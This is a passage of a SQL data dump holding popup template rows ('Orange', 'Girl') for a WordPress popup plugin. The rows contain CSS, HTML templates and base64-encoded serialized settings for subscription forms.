arial;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n}\r\n#ppsPopupShell_[ID], #ppsPopupShell_[ID] * {\r\n	-webkit-box-sizing: content-box;\r\n	-moz-box-sizing:    content-box;\r\n	box-sizing:         content-box;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 100%;\r\n  	border-left: 15px solid;\r\n  	[if bg_type_2 == \'color\']\r\n  	border-color:[bg_color_2];\r\n    [elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n      \r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	box-shadow: 0 0 10px rgba(0,0,0,0.5);\r\n  	padding: 10px;\r\n  	border-radius: 3px;\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: #000;\r\n    font-family: \'PT Sans\', sans-serif;\r\n	text-align: center;\r\n	font-size: 38px;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	margin-top: 15px;\r\n	display: block;\r\n  	margin-bottom: 15px;;\r\n	padding-left: 20px;\r\n	-moz-text-shadow: 0px 0px 1px #000;\r\n	-webkit-text-shadow: 0px 0px 1px #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 1% 1% 1% 1%;\r\n	text-align:right;\r\n	margin-bottom: 20px;\r\n  	padding-left: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	/*width: 100%;*/\r\n  	margin-bottom: 10px;\r\n  	height: 40px;\r\n  	border: 0px solid #d1b36d;\r\n	border-radius: 4px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 20px;\r\n  	font-size: 15px;\r\n	width:100%;\r\n  	max-width: 284px;\r\n	display: block;\r\n	float: left;\r\n  	border: 1px solid #e2e2e2;\r\n  	margin-top: 1px;\r\n  	background-color: #fff;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n  	text-align: left;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	font-size: 17px;\r\n  	border-radius: 4px !important;\r\n  	margin-left: -1px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n	border-color: #000;\r\n	width: 30%;\r\n  	padding: 6px 0 0 0;\r\n  	text-align: center;\r\n 	cursor: pointer;\r\n  	text-decoration: none;\r\n  	color: #333333;\r\n  	font-size: 17px;\r\n  	font-family: \'PT Sans\', sans-serif;\r\n  	text-shadow: 0px 1px 0px #FFF;\r\n  	display:block;\r\n  	float: left;\r\n	margin-left: 30px;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: [bg_color_1] 100%;\r\n   	box-shadow: -4px -4px 0px rgba(0, 0, 0, 0.1) inset;\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #fff;\r\n    font-size: 20px;\r\n    text-shadow: 1px 1px 1px #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n   box-shadow: 4px 4px 0px rgba(0, 0, 0, 0.1) inset;\r\n	\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n	float: left;\r\n  	width: 90%;\r\n	font-family: \'PT Sans\', sans-serif;\r\n  	color: [bg_color_1];\r\n  	font-size: 25px;\r\n  	line-height: 25px;\r\n  	display: block;\r\n  	margin-bottom: 27px;\r\n    padding: 0px 20px 0px 20px;\r\n  	text-align: center;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n	top: 15px;\r\n  	right: -20px !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSm{\r\n	margin-top:20px;\r\n}\r\n.ppsPopupShell .ppsErrorMsg{\r\n  width: 200px;\r\n}\r\n\r\n','eco.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',9,0),(22,'Orange',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjYxOntzOjU6IndpZHRoIjtzOjM6IjgyNCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6NToiY29sb3IiO3M6ODoiYmdfaW1nXzAiO3M6MDoiIjtzOjEwOiJiZ19jb2xvcl8wIjtzOjc6IiNmZWZlZmUiO3M6OToiYmdfdHlwZV8xIjtzOjU6ImNvbG9yIjtzOjg6ImJnX2ltZ18xIjtzOjA6IiI7czoxMDoiYmdfY29sb3JfMSI7czo3OiIjZjU0ZjM2IjtzOjk6ImJnX3R5cGVfMiI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMiI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzIiO3M6NzoiIzhiYzkwYyI7czo5OiJiZ190eXBlXzMiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18zIjtzOjM1OiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy9sb2dvLnBuZyI7czoxMDoiYmdfY29sb3JfMyI7czowOiIiO3M6MTA6ImZvbnRfbGFiZWwiO3M6NzoiZGVmYXVsdCI7czoxNjoibGFiZWxfZm9udF9jb2xvciI7czo3OiIjMDAwMDAwIjtzOjEwOiJmb250X3R4dF8wIjtzOjc6ImRlZmF1bHQiO3M6MTc6InRleHRfZm9udF9jb2xvcl8wIjtzOjc6IiMwMDAwMDAiO3M6MTE6ImZvbnRfZm9vdGVyIjtzOjc6ImRlZmF1bHQiO3M6MTc6ImZvb3Rlcl9mb250X2NvbG9yIjtzOjc6IiMwMDAwMDAiO3M6OToiY2xvc2VfYnRuIjtzOjI3OiJjbG9zZS1ibGFjay1pbi13aGl0ZS1jaXJjbGUiO3M6NzoiYnVsbGV0cyI7czoxMToibGlzdHNfZ3JlZW4iO3M6MTM6ImVuYl9zdWJzY3JpYmUiO3M6MToiMSI7czo4OiJzdWJfZGVzdCI7czo5OiJ3b3JkcHJlc3MiO3M6MjM6InN1Yl93cF9jcmVhdGVfdXNlcl9yb2xlIjtzOjEwOiJzdWJzY3JpYmVyIjtzOjE5OiJzdWJfYXdlYmVyX2xpc3RuYW1lIjtzOjA6IiI7czoyMToic3ViX2F3ZWJlcl9hZHRyYWNraW5nIjtzOjA6IiI7czoyMToic3ViX21haWxjaGltcF9hcGlfa2V5IjtzOjA6IiI7czoxNDoic3ViX2dyX2FwaV9rZXkiO3M6MDoiIjtzOjE0OiJzdWJfYWNfYXBpX3VybCI7czowOiIiO3M6MTQ6InN1Yl9hY19hcGlfa2V5IjtzOjA6IiI7czoxODoic3ViX2FyX2Zvcm1fYWN0aW9uIjtzOjA6IiI7czoxMDoic3ViX3NnYV9pZCI7czowOiIiO3M6MTU6InN1Yl9zZ2FfbGlzdF9pZCI7czowOiIiO3M6MjE6InN1Yl9zZ2FfYWN0aXZhdGVfY29kZSI7czowOiIiO3M6MTA6InN1Yl9maWVsZHMiO2E6Mjp7czo0OiJuYW1lIjthOjc6e3M6MzoiZW5iIjtzOjE6IjEiO3M6NDoibmFtZSI7czo0OiJuYW1lIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo0OiJOYW1lIjtzOjU6InZhbHVlIjtzOjA6IiI7czo2OiJjdXN0b20iO3M6MToiMCI7czo5OiJtYW5kYXRvcnkiO3M6MToiMCI7fXM6NToiZW1haWwiO2E6Nzp7czo0OiJuYW1lIjtzOjU6ImVtYWlsIjtzOjQ6Imh0bWwiO3M6NDoidGV4dCI7czo1OiJsYWJlbCI7czo2OiJFLU1haWwiO3M6NToidmFsdWUiO3M6MDoiIjtzOjY6ImN1c3RvbSI7czoxOiIwIjtzOjk6Im1hbmRhdG9yeSI7czoxOiIxIjtzOjM6ImVuYiI7czoxOiIxIjt9fXM6MjA6InN1Yl90eHRfY29uZmlybV9zZW50IjtzOjY3OiJDb25maXJtYXRpb24gbGluayB3YXMgc2VudCB0byB5b3VyIGVtYWlsIGFkZHJlc3MuIENoZWNrIHlvdXIgZW1haWwhIjtzOjE1OiJzdWJfdHh0X3N1Y2Nlc3MiO3M6MjQ6IlRoYW5rIHlvdSBmb3Igc3Vic2NyaWJlISI7czoyMToic3ViX3R4dF9pbnZhbGlkX2VtYWlsIjtzOjIyOiJFbXB0eSBvciBpbnZhbGlkIGVtYWlsIjtzOjE2OiJzdWJfcmVkaXJlY3RfdXJsIjtzOjA6IiI7czoyODoic3ViX3R4dF9jb25maXJtX21haWxfc3ViamVjdCI7czozNDoiQ29uZmlybSBzdWJzY3JpcHRpb24gb24gW3NpdGVuYW1lXSI7czoyNToic3ViX3R4dF9jb25maXJtX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6Mjg6InN1Yl90eHRfY29uZmlybV9tYWlsX21lc3NhZ2UiO3M6MTk3OiJZb3Ugc3Vic2NyaWJlZCBvbiBzaXRlIDxhIGhyZWY9XCJbc2l0ZXVybF1cIj5bc2l0ZW5hbWVdPC9hPi4gRm9sbG93IDxhIGhyZWY9XCJbY29uZmlybV9saW5rXVwiPnRoaXMgbGluazwvYT4gdG8gY29tcGxldGUgeW91ciBzdWJzY3JpcHRpb24uIElmIHlvdSBkaWQgbm90IHN1YnNjcmliZSBoZXJlIC0ganVzdCBpZ25vcmUgdGhpcyBtZXNzYWdlLiI7czozMToic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfc3ViamVjdCI7czozNzoiW3NpdGVuYW1lXSBZb3VyIHVzZXJuYW1lIGFuZCBwYXNzd29yZCI7czoyODoic3ViX3R4dF9zdWJzY3JpYmVyX21haWxfZnJvbSI7czoxNDoiYWRtaW5AbWFpbC5jb20iO3M6MzE6InN1Yl90eHRfc3Vic2NyaWJlcl9tYWlsX21lc3NhZ2UiO3M6NjU6IlVzZXJuYW1lOiBbdXNlcl9sb2dpbl08YnIgLz5QYXNzd29yZDogW3Bhc3N3b3JkXTxiciAvPltsb2dpbl91cmxdIjtzOjI1OiJzdWJfcmVkaXJlY3RfZW1haWxfZXhpc3RzIjtzOjA6IiI7czoxMzoic3ViX2J0bl9sYWJlbCI7czo4OiJTaWduLXVwISI7czoxNToiZW5iX3NtX2ZhY2Vib29rIjtzOjE6IjEiO3M6MTc6ImVuYl9zbV9nb29nbGVwbHVzIjtzOjE6IjEiO3M6MTQ6ImVuYl9zbV90d2l0dGVyIjtzOjE6IjEiO3M6OToic21fZGVzaWduIjtzOjY6InNpbXBsZSI7czo4OiJhbmltX2tleSI7czo0OiJub25lIjtzOjEzOiJhbmltX2R1cmF0aW9uIjtzOjA6IiI7czoxMToibGF5ZXJlZF9wb3MiO3M6MzoidG9wIjtzOjk6ImVuYl9sYWJlbCI7czoxOiIxIjtzOjU6ImxhYmVsIjtzOjIyOiJTdWJzY3JpYmUgYW5kIEdldCBOZXdzIjtzOjk6ImVuYl90eHRfMCI7czoxOiIxIjtzOjk6ImZvb3Rfbm90ZSI7czoxMTg6IldlIHJlc3BlY3QgeW91ciBwcml2YWN5LiBZb3VyIGluZm9ybWF0aW9uIHdpbGwgbm90IGJlIHNoYXJlZCB3aXRoIGFueSB0aGlyZCBwYXJ0eSBhbmQgeW91IGNhbiB1bnN1YnNjcmliZSBhdCBhbnkgdGltZSAiO3M6NToidHh0XzAiO3M6MTczOiI8cD5Qb3B1cCBieSBTdXBzeXN0aWMgbGV0cyB5b3UgZWFzaWx5IGNyZWF0ZSBlbGVnYW50IG92ZXJsYXBwaW5nIHdpbmRvd3Mgd2l0aCB1bmxpbWl0ZWQgZmVhdHVyZXMuIFBvcC11cHMgd2l0aCBTbGlkZXIsIExpZ2h0Ym94LCBDb250YWN0IGFuZCBTdWJzY3JpcHRpb24gZm9ybXMgYW5kIG1vcmUuPC9wPiI7fXM6MTA6Im9wdHNfYXR0cnMiO2E6Mjp7czo5OiJiZ19udW1iZXIiO3M6MToiNCI7czoxNjoidHh0X2Jsb2NrX251bWJlciI7czoxOiIxIjt9fQ==','<link rel=\"stylesheet\" type=\"text/css\" href=\"//fonts.googleapis.com/css?family=Didact+Gothic\" />\r\n<div id=\"ppsPopupShell_[ID]\" class=\"ppsPopupShell ppsPopupListsShell\">\r\n	<a href=\"#\" class=\"ppsPopupClose ppsPopupClose_[close_btn]\"></a>\r\n	<div class=\"ppsInnerTblContent\">\r\n		<div class=\"ppsPopupListsInner ppsPopupInner\">\r\n			[if enb_label]\r\n				<div class=\"ppsPopupLabel ppsPopupListsLabel\">[label]</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n			[if enb_txt_0]\r\n				<div class=\"ppsPopupTxt ppsPopupClassyTxt ppsPopupClassyTxt_0 ppsPopupTxt_0\">\r\n				[txt_0]\r\n				</div>\r\n			[endif]\r\n			<div style=\"clear: both;\"></div>\r\n		</div>\r\n		<div class=\"ppsRightCol\">\r\n			<div class=\"logo\"></div>\r\n			[if enb_subscribe]\r\n				<div class=\"ppsSubscribeShell\">\r\n					[sub_form_start]\r\n					[sub_fields_html]\r\n					<input type=\"submit\" name=\"submit\" value=\"[sub_btn_label]\" />\r\n					[sub_form_end]\r\n					<div style=\"clear: both;\"></div>\r\n				</div>\r\n			[endif]\r\n			[if enb_sm]\r\n				<div class=\"ppsSm\">\r\n				[sm_html]\r\n				</div>\r\n			[endif]\r\n			[if enb_foot_note]\r\n				<div class=\"ppsFootNote\">\r\n				[foot_note]\r\n				</div>\r\n			[endif]\r\n		</div>\r\n	</div>\r\n</div>','#ppsPopupShell_[ID] {\r\n	width: [width][width_measure];\r\n  	padding: 15px;\r\n  	font-family: Georgia, Times, serif;\r\n	font-size: 13px;\r\n	line-height: 21px;\r\n	font-weight: normal;\r\n	color: #000;\r\n}\r\n#ppsPopupShell_[ID] .ppsInnerTblContent {\r\n	display: table;\r\n  	width: 100%;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupInner {\r\n  {% if popup.params.tpl.enb_subscribe or popup.params.tpl.enb_foot_note or popup.params.tpl.enb_sm %}\r\n  	width: 66%;\r\n	[else]\r\n  	width: 100%;\r\n  	[endif]\r\n  	display: table-cell;\r\n  	/*float: left;*/\r\n  	vertical-align: top;\r\n	[if bg_type_0 == \'color\']\r\n	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}), color-stop(100%, [bg_color_0])); /* safari4+,chrome */\r\n	background:-webkit-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* safari5.1+,chrome10+ */\r\n	background: -o-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* opera 11.10+ */\r\n	background: -ms-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* ie10+ */\r\n	background:radial-gradient(ellipse at center, {{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }} 0%, [bg_color_0] 100%); /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_0, 50) }}\', endColorstr=\'[bg_color_0]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_0 == \'img\']\r\n  	background-image: url(\"[bg_img_0]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupLabel {\r\n	color: [bg_color_1];\r\n	font-family: \'Didact Gothic\';\r\n	font-size: 36px;\r\n  	text-align:center;\r\n	letter-spacing: -1px;\r\n	line-height: 40px;\r\n	letter-spacing: -1px;\r\n	font-weight: bold;\r\n	margin-top: 80px;\r\n	margin-bottom: 16px;\r\n	padding-left: 20px;\r\n}\r\n#ppsPopupShell_[ID] .ppsRightCol {\r\n	display: table-cell;\r\n  	/*float: right;*/\r\n  	width: 34%;\r\n  	height: 100%;\r\n  	text-align: center;\r\n  	[if bg_type_1 == \'color\']\r\n  	background: -moz-radial-gradient(center, ellipse cover, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }} 0%, [bg_color_1] 100%); /* ff3.6+ */\r\n	background: -webkit-gradient(radial, center center, 0px, center center, 100%, color-stop(0%, {{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}), color-stop(100%, [bg_color_1])); /* safari4+,chrome */\r\n	background:[bg_color_1]; /* w3c */\r\n	filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\'{{ adjust_brightness(popup.params.tpl.bg_color_1, 50) }}\', endColorstr=\'[bg_color_1]\',GradientType=1 ); /* ie6-9 */\r\n  	[elseif bg_type_1 == \'img\']\r\n  	background-image: url(\"[bg_img_1]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  	\r\n}\r\n\r\n#ppsPopupShell_[ID] .logo{\r\n	[if bg_type_3 == \'color\']\r\n	background: [bg_color_3];\r\n  	[elseif bg_type_3 == \'img\']\r\n  	background-image: url(\"[bg_img_3]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n	border-radius: 50%;\r\n	-moz-border-radius: 50%;\r\n	-webkit-border-radius: 50%;\r\n	height: 130px;\r\n	width: 130px;\r\n  	display: inline-block;\r\n  	margin: 30px 0;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell form {\r\n	padding: 0 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	width: 100%;\r\n  	margin-bottom: 15px;\r\n  	height: 30px;\r\n  	border: 1px solid #d1b36d;\r\n  	border-radius: 4px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=text],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=password],#ppsPopupShell_[ID] .ppsSubscribeShell input[type=email],\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	box-shadow: 2px 2px 2px #dcdcdc inset;\r\n  	padding-left: 10px;\r\n  	font-size: 17px;\r\n  	background-color: #fff;\r\n  	display: block;\r\n  	text-align:center;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelect {\r\n	display: table;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel,\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	display: table-cell;\r\n  	\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell .ppsSubSelectLabel {\r\n	opacity: 0.5;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell select {\r\n	width: 100%;\r\n  	background-color: transparent;\r\n  	height: 40px;\r\n  	border: none;\r\n  	margin-left: -5px;\r\n  	font-size: 17px;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell textarea {\r\n	font-family: inherit;\r\n  	height: auto;\r\n    padding-top: 5px;\r\n}\r\n\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit] {\r\n  	width: 105%;\r\n  	[if bg_type_2 == \'color\']\r\n  	background: [bg_color_2];\r\n    [elseif bg_type_2 == \'img\']\r\n  	background-image: url(\"[bg_img_2]\");\r\n  	background-repeat: no-repeat;\r\n  	background-size: cover;\r\n  	[endif]\r\n  \r\n  	color: #fff;\r\n    font-size: 20px;\r\n    text-shadow: 2px 2px 2px #000;\r\n  	cursor: pointer;\r\n  	padding: 0;\r\n}\r\n#ppsPopupShell_[ID] .ppsSubscribeShell input[type=submit]:hover {\r\n	box-shadow: inset 1px 1px 3px #666;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupTxt_0 {\r\n  	text-align:center;\r\n	font-family: \'Didact Gothic\';\r\n    font-size: 25px;\r\n	float: left;\r\n  	width: 100%;\r\n  	text-align: center;\r\n    line-height: 1.2;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose {\r\n	background-repeat: no-repeat;\r\n  	cursor: pointer;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose.ppsPopupClose_lists_black {\r\n 	top: 0 !important;\r\n  	right: 0 !important;\r\n}\r\n#ppsPopupShell_[ID] .ppsPopupClose:hover {\r\n	opacity: 0.8;\r\n}\r\n#ppsPopupShell_[ID] .ppsFootNote{\r\n	color: #585858;\r\n    font-family: \"Helvetica Neue\",Helvetica,Arial,sans-serif;\r\n    font-size: x-small;\r\n    font-style: italic;\r\n    line-height: 14px;\r\n  	margin: 5px 30px;\r\n}\r\n#ppsPopupShell_[ID] .ppsErrorMsg {\r\n	color: #fff !important;\r\n}','orange.png',1,1,1,1,0,0,0,'2015-01-10 17:59:43',23,0),(23,'Girl',1,0,'YTozOntzOjQ6Im1haW4iO2E6MTc6e3M6Nzoic2hvd19vbiI7czo5OiJwYWdlX2xvYWQiO3M6MjM6InNob3dfb25fcGFnZV9sb2FkX2RlbGF5IjtzOjA6IiI7czoyNzoic2hvd19vbl9zY3JvbGxfd2luZG93X2RlbGF5IjtzOjE6IjAiO3M6MzM6InNob3dfb25fc2Nyb2xsX3dpbmRvd19wZXJjX3Njcm9sbCI7czoxOiIwIjtzOjI4OiJzaG93X29uX2FmdGVyX2luYWN0aXZlX3ZhbHVlIjtzOjI6IjEwIjtzOjg6ImNsb3NlX29uIjtzOjEwOiJ1c2VyX2Nsb3NlIjtzOjI1OiJjbG9zZV9vbl9hZnRlcl90aW1lX3ZhbHVlIjtzOjE6IjUiO3M6MTA6InNob3dfcGFnZXMiO3M6MzoiYWxsIjtzOjc6InNob3dfdG8iO3M6ODoiZXZlcnlvbmUiO3M6Mjk6InNob3dfdG9fZmlyc3RfdGltZV92aXNpdF9kYXlzIjtzOjI6IjMwIjtzOjMwOiJzaG93X3RvX3VudGlsX21ha2VfYWN0aW9uX2RheXMiO3M6MjoiMzAiO3M6MjE6ImhpZGVfZm9yX2RldmljZXNfc2hvdyI7czoxOiIwIjtzOjI0OiJoaWRlX2Zvcl9wb3N0X3R5cGVzX3Nob3ciO3M6MToiMCI7czoxNzoiaGlkZV9mb3JfaXBzX3Nob3ciO3M6MToiMCI7czoxMjoiaGlkZV9mb3JfaXBzIjtzOjA6IiI7czoyMzoiaGlkZV9mb3JfY291bnRyaWVzX3Nob3ciO3M6MToiMCI7czoyMzoiaGlkZV9mb3JfbGFuZ3VhZ2VzX3Nob3ciO3M6MToiMCI7fXM6MzoidHBsIjthOjYxOntzOjU6IndpZHRoIjtzOjM6IjgwMCI7czoxMzoid2lkdGhfbWVhc3VyZSI7czoyOiJweCI7czoxODoiYmdfb3ZlcmxheV9vcGFjaXR5IjtzOjM6IjAuNSI7czo5OiJiZ190eXBlXzAiO3M6MzoiaW1nIjtzOjg6ImJnX2ltZ18wIjtzOjQxOiJbUFBTX0FTU0VUU19VUkxdaW1nL2Fzc2V0cy9iYWNrZ3JvdW5kLmpwZyI7czoxMDoiYmdfY29sb3JfMCI7czo3OiIjZTVlNWU1IjtzOjk6ImJnX3R5cGVfMSI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMSI7czozOToiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvYnV0dG9uLTEucG5nIjtzOjEwOiJiZ19jb2xvcl8xIjtzOjc6IiNmZmZmZmYiO3M6OToiYmdfdHlwZV8yIjtzOjM6ImltZyI7czo4OiJiZ19pbWdfMiI7czozNToiW1BQU19BU1NFVFNfVVJMXWltZy9hc3NldHMvZ2lybC5wbmciO3M6MTA6ImJnX2NvbG9yXzIiO3M6MDoiIjtzOjk6ImJnX3R5cGVfMyI7czo1OiJjb2xvciI7czo4OiJiZ19pbWdfMyI7czowOiIiO3M6MTA6ImJnX2NvbG9yXzMiO3M6NzoiIzNkM2QzZCI7czoxMDoiZm9udF9sYWJlbCI7czo3OiJkZWZhdWx0IjtzOjE2OiJsYWJlbF9mb250X2NvbG9yIjtzOjc6IiNmZjQ0MTEiO3M6MTA6ImZvbnRfdHh0XzAiO3M6NzoiZGVmYXVsdCI7czoxNzoidGV4dF9mb250X2NvbG9